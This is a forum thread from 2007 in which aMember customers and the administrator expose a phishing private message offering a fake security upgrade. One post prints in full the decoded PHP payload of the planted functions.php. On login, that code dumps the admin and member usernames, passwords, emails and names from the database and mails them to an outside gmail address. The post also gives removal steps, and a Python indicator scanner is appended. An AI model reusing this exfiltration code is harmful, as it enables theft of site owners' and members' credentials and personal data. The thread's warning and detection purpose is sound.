Servicebot sending PM Upgrades?

Discussion in 'Installation' started by eleven, Oct 22, 2007.

  1. eleven

    eleven aMember Pro Customer

    Joined:
    Jan 28, 2006
    Messages:
    38
    Is this legit?
    I got a PM with an upgrade link..

    amember-downloads.com/

    This seems like a scam?

    The upgrade file is totally different than what I got from inside my members account.
  2. lavella

    lavella New Member

    Joined:
    Apr 19, 2007
    Messages:
    29
    I got one as well... Doesn't seem to be the normal way that Alex usually sends out updates... Not going to download and update.

    Anyone else get this?
  3. CrackBaby

    CrackBaby Member

    Joined:
    Aug 22, 2006
    Messages:
    154
    I got it, but I am not going to get that from that link; I always download from my members page.

    The message looks legit, as for that to pop up like that the script would be in Alex's webpages.

    On the other hand, why would Alex ask us to download from download.com?

    To me that is not right, since you have to pay for updates.
  4. jenolan

    jenolan aMember Coder

    Joined:
    Nov 3, 2006
    Messages:
    510
    Doesn't seem to be. I did a compare of the files; all the changes are rubbish.

    Might be an attempt to insert bodgey files later... I would wait to hear from Alex.
  5. alexander

    alexander Administrator Staff Member

    Joined:
    Jan 8, 2003
    Messages:
    6,279
    Yes, this is a SCAM.
    We don't send security updates this way. Please disregard that message.
    PM service has been disabled temporarily.
  6. kel

    kel aMember Pro Customer

    Joined:
    May 20, 2004
    Messages:
    16
    Warning

    I did a WHOIS lookup of that domain, the site has a private registrant. It's definitely not amember.com or cgi-central.net.

    This looks like a targeted phishing attempt... BE WARNED EVERYBODY, it looks dangerous to install these files.
  7. jake07

    jake07 New Member

    Joined:
    Oct 5, 2007
    Messages:
    4
    Why didn't you send an email telling people it is a scam??? I thought it was real and uploaded the files... luckily the new files were there for just 3 minutes, and then I reloaded from backup files. (There is an extra file functions.php which must be deleted.)

    You should send an email to everyone and post a warning in the forum...

    If I had not read the forum today, I wouldn't have known the PM was a fake.
  8. duane

    duane New Member

    Joined:
    May 27, 2007
    Messages:
    1
    I did the same as jake07. An email advising all users of this would have been most helpful!
  9. mrcd

    mrcd New Member

    Joined:
    Aug 22, 2006
    Messages:
    1
    Luckily I see so much spam I never download updates directly from an email.

    So upon checking my PM box here, I noticed the original message was deleted. And then I went to this thread.

    Glad my cynical attitude was right this time. I'd be more than happy to sign up for a customer-only notification list where you could contact me with legitimate updates or scam warnings.
  10. jenolan

    jenolan aMember Coder

    Joined:
    Nov 3, 2006
    Messages:
    510
    Unless you expect someone to be online 24/7, they can't advise you it is a scam before they see the thing. Alex did email everyone, probably as soon as he saw it and as fast as he could type it.
  11. lasvegasextremes

    lasvegasextremes New Member

    Joined:
    May 7, 2007
    Messages:
    3
    Thank goodness for the email advisement.

    I overlooked the domain name it came from and downloaded it to my desktop and was gonna install when I had the chance to open it.

    I thought it was just a newer, efficient method to reach everyone with an account.
  12. laburke

    laburke New Member

    Joined:
    Jun 13, 2007
    Messages:
    5
    I appreciate the e-mail warning. I too was going to install the PM update when I had time. And I thought I was good at detecting scams. I didn't even think twice about it. Something must be wrong with my scam detector neurons...but anyway, thanks for letting us know!
  13. eleven

    eleven aMember Pro Customer

    Joined:
    Jan 28, 2006
    Messages:
    38
    Man..

    That sucks.

    Alex and aMember do a great job..

    This was somebody that clearly slipped under the radar.

    Do scammers have really nothing better to do?
  14. getresults

    getresults Member

    Joined:
    Nov 1, 2006
    Messages:
    87
    CRITICAL WARNING - The PM scam completely compromises your database!

    URGENT - READ THIS IMMEDIATELY!

    If you installed the bogus update contained in the PM update scam then your entire Amember database (all admin user and member details) has been completely compromised!

    I'm really surprised not to see more threads about this bogus update email sent a couple of weeks ago.

    I now wish I'd logged into the forum sooner but I've been incredibly busy and assumed someone else would have clearly posted about this hack.

    I also received the PM with the "security notice" and downloaded the update from amember-downloads.com.

    This is an attack that will compromise your amember member database if you downloaded and installed the "update".

    I have to admit it was a cleverly thought out attack as I didn't stop to question the domain name or that it might not be real.

    Here's what happens if you install this bogus update.

    What the attack does is add an extra file called functions.php in the main directory that is executed when someone logs into Amember by accessing the login.php page.

    functions.php includes a hidden, encoded function which extracts the username and passwords of your admin users from the database and also the member id, username, password, email address, first name and last name of every member in your database.

    All of those details are then emailed to a gmail email address.

    So if anyone reading this patched their copy of Amember with the bogus patch then your database has been completely compromised.

    At the very least you need to change all of your admin passwords immediately.

    It would also be a good idea to notify your members to change all their passwords as well.

    If you're not sure if you updated the patch or not, look in the directory where amember is installed and look for a file called functions.php. If you see that file and view it, you'll find that it is mostly filled with empty lines. On line 841 you will see an encoded function (it looks like gibberish) that starts with:

    base64_decode('ZXZhbChiY ...

    This is the function that copies all your database details and emails it to the gmail address.

    To remove this attack you must delete the functions.php file.

    You must also edit login.php, go to line 21 and delete the line:

    include('./functions.php');

    This prevents login.php from trying to load and execute functions.php.

    The key lesson here is to NEVER, EVER trust an Amember security update that is sent via a PM - just as Alex said.

    I really hope this hasn't affected too many Amember owners.

    Here is the decoded php code from functions.php:

    Code:
    @include_once('config.inc.php');
    
    $sql_data = "db=$pc[db] \nuser=$pc[user] \npass=$pc[pass] \nhost=$pc[host] \n";
    $host = "server=$_SERVER[HOST] \npath=$_SERVER[SCRIPT_NAME] \n ";
    
    $sql = @mysql_pconnect($pc[host], $pc[user], $pc[pass]);
    @mysql_select_db($pc[db]);
    
    $site = '';
    $result = @mysql_query('SELECT `value` FROM `'.$pc['prefix'].'config` WHERE `name` = "root_url" LIMIT 1');
    while($row = mysql_fetch_assoc($result)){
    $site = $row['value'];
    }
    
    
    $admins = "ADMINS:\n";
    $result = @mysql_query('SELECT `admin_id`,`login`,`pass` FROM `'.$pc['prefix'].'admins`');
    while($row = mysql_fetch_assoc($result)){
    $admins .= "$row[admin_id] $row[login] $row[pass]\n";
    }
    
    $members = "MEMBERS:\n";
    $result = @mysql_query('SELECT `member_id`,`login`,`pass`,`email`,`name_f`,`name_l` FROM `'.$pc['prefix'].'members');
    while($row = mysql_fetch_assoc($result)){
    $members .= "$row[member_id] $row[login] $row[pass] $row[email] $row[name_f] $row[name_l]\n";
    }
    
    @mysql_close($sql);
    
    $final_data = $sql_data."\n".$host."\n".$admins."\n".$members;
    $final_data = base64_encode($final_data);
    
    $sent_times = @file('data\errorlog.txt');
    $sent_times = (int)$sent_times[0];
    if ($sent_times < 5) {
    @mail('amemberdump@gmail.com', $site, $final_data);
    
    $sent_times++;
    $fd = @fopen ('data\errorlog.txt', "w+");
    @fputs($fd, $sent_times++);
    @fclose ($fd);
    }
    
    if (isset($_GET['print'])){
    die($final_data);
    }
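
A defender-side check for the two indicators this post describes (the dropped functions.php that is mostly blank lines with a base64_decode() call, and the include('./functions.php') line added to login.php), written as an added example in Python rather than PHP; it is not code from the thread or from aMember. The sample directory built by build_sample_install is constructed here, with the line numbers 21 and 841 taken from the post above, and the base64 prefix 'ZXZhbChiY' is the one quoted in the post.

```python
import base64
import os
import re
import tempfile

# Indicators from the post: a dropped functions.php that is mostly blank lines with one
# base64_decode(...) call, and an include('./functions.php') line added to login.php.
INCLUDE_RE = re.compile(r"include\s*\(\s*['\"]\./functions\.php['\"]\s*\)")
B64_CALL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)")


def decode_prefix(b64_literal):
    # Decode the longest 4-aligned prefix of a (possibly truncated) base64 literal so an
    # analyst can see how the payload starts (e.g. a nested eval) without executing it.
    usable = b64_literal[: len(b64_literal) - len(b64_literal) % 4]
    try:
        return base64.b64decode(usable).decode("latin-1")
    except (ValueError, UnicodeDecodeError):
        return ""


def scan_amember_dir(root):
    """Return (file, line, detail) for each indicator found directly under root."""
    findings = []
    fpath = os.path.join(root, "functions.php")
    if os.path.isfile(fpath):
        with open(fpath, encoding="latin-1") as fh:
            lines = fh.read().splitlines()
        blank = sum(1 for ln in lines if not ln.strip())
        for num, ln in enumerate(lines, 1):
            m = B64_CALL_RE.search(ln)
            if m:
                detail = "base64_decode payload, decoded prefix %r (%d of %d lines blank)" % (decode_prefix(m.group(1)), blank, len(lines))
                findings.append(("functions.php", num, detail))
    lpath = os.path.join(root, "login.php")
    if os.path.isfile(lpath):
        with open(lpath, encoding="latin-1") as fh:
            for num, ln in enumerate(fh, 1):
                if INCLUDE_RE.search(ln):
                    findings.append(("login.php", num, "include of ./functions.php"))
    return findings


def build_sample_install(infected=True):
    """Constructed sample directory (not real aMember files) matching the post's layout."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "login.php"), "w") as fh:
        fh.write("<?php\n" + "// placeholder\n" * 19)  # 20 lines of filler
        if infected:
            fh.write("include('./functions.php');\n")  # line 21, as in the post
    if infected:  # 839 blank lines push the payload to line 841, as in the post
        with open(os.path.join(root, "functions.php"), "w") as fh:
            fh.write("<?php\n" + "\n" * 839 + "eval(base64_decode('ZXZhbChiY...'));\n")
    return root
```

Running scan_amember_dir against a real install directory reports the same two findings if the bogus patch was applied, and an empty list on a clean install.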
    
